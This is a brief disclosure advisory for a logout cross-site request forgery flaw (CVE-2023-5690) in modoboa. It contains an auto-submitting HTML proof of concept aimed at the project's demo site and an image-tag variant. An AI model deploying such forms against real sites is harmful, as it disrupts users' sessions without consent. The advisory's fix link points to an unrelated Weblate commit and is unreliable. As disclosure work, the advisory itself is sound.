CVE-2023-5690: Cross-Site Request Forgery Vulnerability in Logout Functionality in modoboa

Description

Logout CSRF is a security vulnerability where an attacker forces a user to unknowingly log out of their session by tricking them into triggering a logout request through a malicious website or link.

The csrftoken for the logout interface is invalid, it is recommended to change it to http post type to send the request

GET /accounts/logout/

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.modoboa.org/accounts/logout/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

The fix can be found in
https://github.com/WeblateOrg/weblate/commit/bfa82b569114608d3fc16d2f957ee2ab696cd581

Impact

This vulnerability is capable of causing a user to inadvertently log out.
For example src="<your logout link>"
One way GET could be abused here is if a person (maybe a competitor :)) places an image tag anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.
Although this won’t harm the user’s account, it can be a big annoyance and is valid for CSRF.

Occurrences